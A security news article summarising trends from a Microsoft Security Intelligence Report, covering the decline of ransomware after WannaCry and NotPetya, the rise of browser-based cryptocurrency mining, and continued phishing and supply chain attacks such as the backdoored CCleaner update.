Security Experts Warn That Ransomware Creators Are Going Phishing

On May 12, 2017, the WannaCry ransomware encrypted the files of over 200 thousand Windows PCs all around the world and caused millions of dollars in damages. Thanks to EternalBlue, a hacking tool allegedly developed by the NSA, WannaCry managed to spread quickly and affected users and organizations of all shapes and sizes. Fortunately, a cybersecurity expert by the name of Marcus Hutchins managed to stop the infection, but the impact was still significant enough to get the mainstream media talking about ransomware.

On June 27, 2017, exactly 46 days later, the headlines were occupied by NotPetya – another malware strain that demands a ransom. Although, as later analysis revealed, NotPetya was not a typical ransomware family, it acted like one, and a second outbreak in the span of a month and a half meant that people were suddenly taking the threat a lot more seriously.

WannaCry and NotPetya were just two of the countless file-encrypting malware families that appeared in 2016 and 2017. Ransomware was all the rage in the cyber underground at the time, and many experts thought that because of the high profitability, the crook would continue to use it prolifically in the years to come. As it happens, they weren't quite right.

Ransomware is taking a back seat

For over a decade, Microsoft has used data from its customers to gain a better understanding of the forces that shape the cybersecurity landscape and the changes that happen within it. Recently, the OS developer released its latest Security Intelligence Report and pointed out that surprisingly or not, over the last couple of years, there's been a distinctive move away from ransomware. In fact, between March 2017 and December 2018, Microsoft saw a 60% decrease in the number of ransomware attacks.

These figures are based on data gathered from a large number of users, so they should be pretty accurate. Even if you don't trust them, however, you can go through reports from other companies which will also confirm that cybercriminals are actively investing time and effort into non-ransomware attacks which, while not as destructive, can be just as (if not more) profitable.

Cryptocurrency mining gains popularity

Most of you probably remember the astronomical surge in value that cryptocurrencies of various description experienced in 2016. Prices peaked, and people started thinking that owning some digital coins will make them incredibly wealthy.

The thing is, mining cryptocurrency on your own hardware requires a significant initial investment and can result in a hefty electricity bill. If you're using other people's PCs, however, you don't need to worry about any of this.

Microsoft's report shows that shortly after the price of crypto coins shot up, crooks started using mining malware quite extensively. Initially, the miners were distributed through the traditional attack vectors, but at one point, the criminals realized that compromising a legitimate website and embedding cryptocurrency-mining code into it could deliver better results. The JavaScript miner would harness visitors' computer resources to complete a large number of complex calculations and generate crypto coins which would be sent to the crooks. Apart from the poorer performance and the increased electricity consumption, there's nothing immediately visible that can alert the user.

Compare illicit cryptocurrency mining to ransomware, and you'll see why the former has overtaken the latter. It's a much more silent attack that can remain undetected for a far greater period of time. More importantly, its success isn't dependent on whether or not the user has a solid backup strategy, and on their willingness to negotiate with criminals.

As Microsoft's report points out, there are a few other reasons why crooks like cryptocurrency miners, but it must be said that this love affair is unlikely to last long. For one, CoinHive, one of the most popular in-browser miners, was discontinued a couple of months ago, and although there are other similar tools and services available, none of them seems to be that widespread. This isn't incredibly surprising considering the massive decrease in value that digital coins have experienced over the last year or so. The profit margin is much slimmer now which means that cryptocurrency mining, like many other malicious activities, might be reaching its "Best Before" date. Some things in the cybersecurity world never grow old, though.

Phishing and supply chain attacks are still favored by cybercriminals

Regardless of whether a hacker chooses a strain of ransomware or a cryptocurrency miner as their weapon of choice, they need an initial infection vector. Phishing is one of the oldest and most popular ways of gaining unauthorized access to a computer, and it would appear that most crooks have no intention of switching to anything else. In fact, Microsoft reported that between January and December 2018, there was a 250% jump in the share of inbound messages that were determined to be phishing scams.

Phishing has always been (and will likely continue to be) an incredibly successful infection vector because it exploits the fact that when they're subjected to the right social engineering techniques, human beings are simply not very good at keeping themselves safe. Crooks who play their cards right can easily persuade the regular user to click a link, open a file, or give away valuable information. Some criminals, however, have opted for an approach that doesn't involve that much social engineering.

Microsoft explains that last year also saw an uptick in the number of supply chain attacks. During a supply chain attack, hackers compromise the developer of a popular software application and make the said application behave in a way that it's not supposed to. In one of 2018's most noteworthy supply chain attacks, Piriform, the creator of a popular system optimization app called CCleaner, got hit, and as a result, close to 2.3 million users inadvertently downloaded a backdoored update. Software updates nowadays are, for the most part, completely automated, and people tend to trust them which means that victims are unlikely to figure out that something's not quite right until it's already too late.

It shouldn't really be news to anyone that the threat landscape is not sitting still. Ransomware fell out of favor and was replaced by cryptocurrency miners which will sooner or later be replaced by something else. All these dynamic changes mean that we simply don't have the automated tools to protect us against every single threat which is why keeping our wits about us when we're browsing the web is more important than ever.